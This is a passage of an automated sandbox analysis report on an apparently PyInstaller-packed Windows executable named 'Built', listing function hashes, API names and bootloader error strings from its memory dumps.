                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                        • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                        • Instruction ID: c2d361cd21ac02f42fbc834b316bad703b9ea4bbe7922868f994ac3e733a15dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE327A22A0C78291FE199B25D7552B937A1AF74780F8C4036FA5DE26DEEF6CE558C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction ID: d0177ce1be0bee088148b4495f113e7439d53a4f72a89d66a43012e1b8f275c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09C1B036B28A4285EF10CFA5D6906AC3761FB59B98F095235EE2EE7798CF78D055C300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2190517375.00007FFD948A5000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00007FFD941F0000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd941f0000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                        • String ID: t2k
                                                                                                                                                                                                                                                        • API String ID: 3300690313-2611606847
                                                                                                                                                                                                                                                        • Opcode ID: 617ab41ac5f6266e776372983bbbdaefdcc3e4856b6ef77c3e23bad832221715
                                                                                                                                                                                                                                                        • Instruction ID: a060c3c841819272c84194907a97b1649b3d22b526b7e8c3addf851ca7e7a9c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 617ab41ac5f6266e776372983bbbdaefdcc3e4856b6ef77c3e23bad832221715
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E62996272919286E7298F38D49027D77E0F749385F048531EB9ED37C9EABCEA45CB10
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2178131881.00007FFD93B69000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FFD93660000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd93660000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                        • String ID: )tP
                                                                                                                                                                                                                                                        • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                        • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                        • Instruction ID: 857542cb36d0e0602d1755a0dae54a30c21be986e4bd72496ac58e257de40e08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E262262272819286E7258F38D8102BD76E5F74879DF045532EADED37C5EA3CEA55CB00

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E287F90: _fread_nolock.LIBCMT ref: 00007FF65E28803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF65E281A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                                        • Instruction ID: 2955832ee81c1f26e9cabaef6cd2b7726c41183c06a2190047b33413ec606662
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4819D71A0C78686EF209B25D3446B933A1AF68784F484431F98EE778EDE7CE585C741

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                                        • Instruction ID: 6ba09c0d8d2edfa4c93e677ee70fcea47ebae8575d2bbd90d0fdeff36de69caf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B416722A0C74286EE10DB22A7405B97391BF64794F884932FD4DE7A9DDE7CE546CB04

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction ID: 361a7965764dfc78baa3e4ad746461db7474328e1aaed3a7052d0dcef977a902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64517822A0C74285EE60AB12A7503BA7391ABA5B94F8C5135FD4DE7AD9EE3CE541C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 1aed268da54980dbcc0a3475f997841fd5111a5b9c2872efeebdc468a0c0cdb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9215161F1C74281FE209724EB153BA3291BFA8354F884136F69EE66DDEE6CE504C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                        • Instruction ID: 3b3a9a25816a944e00a5cd0b7f45dcc2abe5ed9bd6c8b1f912fbded14ea25787
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32C10522A0CB8691EE609B1597402BD3B56FBA1BC0F5D2131FA4EE3799CE7CE4858714

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                        • Instruction ID: 2ff8d0a668d60eb5aca531fad8723a08db9fd662d9ccfdace69f2d30cebf22c5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F417C21A1C78691EE25DB20E7151E97361FB64344F884132FA5DA369EEF7CE509C740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction ID: abfcec0c1eccae45def0ec14e285701159a39fc1a6af7c93d519b1c65f2ca903
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74418322E5878183EB508B2197503797360FFA47A4F14A339FA9C93AD9DF7CA5E08710

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction ID: 8f88573af3c10fcc84ea9442cc27f9188a21e52087fdf66bad6a8a81d67caf13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A310721E4C24641FE64AB659B623B93681AF71784F4C5034FA0EF72DFDE6DA844C202

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction ID: 82982899e2f7472e2de185292d1da54c25d4651a48abe4ff1f0fbde8bcf0906a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4512661B0924986EF249E259700A7A7291AF60BA4F0C6634FD7CE37CDCE3CE4808606
                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction ID: ac8a5fb4ccc9e17118baaf58dc0298b0c84d4ac98d5e0341e74d6dd2e2f5c245
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911DD22608A8181DE208B25AB40069B361AB61BF0F5C1331FA7D9B7EDCE78D0808700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABD0
Memory Dump Source
• Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction ID: 4d819c8bf71fcc0032d09beda254ae6bef654563870bfdf9c708a506b46b0d80
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE216251F1878241EEA45761979137936829FB47D4F0C6279F92EE7BDDCE6CE4C14200
                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFDA3420000, based on PE: true
• Associated: 00000004.00000002.2197732045.00007FFDA3420000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.2198401846.00007FFDA3582000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.2198401846.00007FFDA3584000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.2198401846.00007FFDA3599000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.2201370576.00007FFDA359B000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.2201550477.00007FFDA359C000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffda3420000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                                        • Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                                        • Instruction ID: 3e4eedd719e1abed98be266b8c001ccaea46bb53e27681c3a2087d2a9685ebc6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3A12C60B0FB4A86FE59DB59A87033422A2BF54B44F840535C90EB77A2DFBEE4519309
                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
